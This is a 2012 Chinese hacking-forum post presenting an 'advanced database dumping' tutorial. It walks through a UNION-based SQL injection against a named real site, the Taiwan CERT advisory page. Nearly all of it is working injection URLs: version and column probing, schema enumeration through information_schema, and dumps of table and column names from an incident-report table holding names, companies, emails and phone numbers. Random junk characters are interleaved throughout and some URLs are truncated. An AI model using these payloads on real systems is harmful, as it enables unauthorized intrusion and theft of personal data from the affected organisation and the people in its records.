找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1921|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询2 G: E$ W. b3 D+ I$ h( j) N% B
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解) g3 s/ m! k- f
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
& C9 z  T8 a) K" {. y) O- [: b3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
2 ]3 }" T( b( S9 g4 C, P数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
9 Z5 p# ~8 ^9 {' o  ?4.判断有没有写权限
" ~  B* K/ `, fhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限  c6 d3 q' M' O8 n% R
没办法,手动猜表啦
0 z, {( u/ z: s6 k5 w5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
8 u! V7 H: K% O& U* P但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
% Z% t  Z8 V! k3 @http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
! c2 l  @# P( R; c/ `; g+ N1 c, H成功查出所有数据库,国外的黑客就是不一般。数据库如下:9 Y3 T+ I" R" u1 P0 L! U  j% \
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
/ ~& F( Q6 N1 G& O. b6.爆表,爆的是twcert库
7 f) t/ o( _% {: t: I1 shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
, s4 G9 |7 V2 ]; c8 s. w爆出如下表
* s3 o; x% z2 H! w- Q0 j/ }downloadfile,irsys,newsdata,secrpt,secrpt_big5
' ]( O# f, P5 J7.爆列名,这次爆的是irsys表
* h% P7 ~! j3 @6 G5 v* X1 bhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
. P! f- E% w9 O爆出如下列
3 }9 P( N1 S7 a! e  y! X7 Vir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status8 A2 V5 \$ A/ u: G# S5 Z2 e
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。4 e9 u$ {1 z. v! ~1 x  Y
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
; W1 W' S1 s0 E1 A返回是3,说明每个列里有3个地段
6 ^: q( p6 g4 E+ C. |9.爆字段内容# \/ Y: o" T% [- M4 N2 a/ k* K7 P
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--, X8 y0 R, s+ H5 X) O# Q2 {# |
爆出name列的第一个字段的内容! M  Z2 u3 `9 A, M& {1 {. p
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--; Z) p8 V. M2 u9 |6 E8 l
爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表